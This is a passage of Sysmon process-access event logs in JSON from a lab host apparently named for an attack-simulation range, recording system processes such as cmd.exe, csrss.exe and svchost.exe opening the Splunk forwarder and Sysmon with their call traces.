C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010DF790500}","SourceProcessId":"4400","SourceThreadId":"4288","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00109B7A0500}","TargetProcessId":"4432","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3504,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00109B7A0500}\r\nTargetProcessId: 4432\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00109B7A0500}","TargetProcessId":"4432","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3505,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3506,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3507,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3508,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3509,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3510,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3511,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 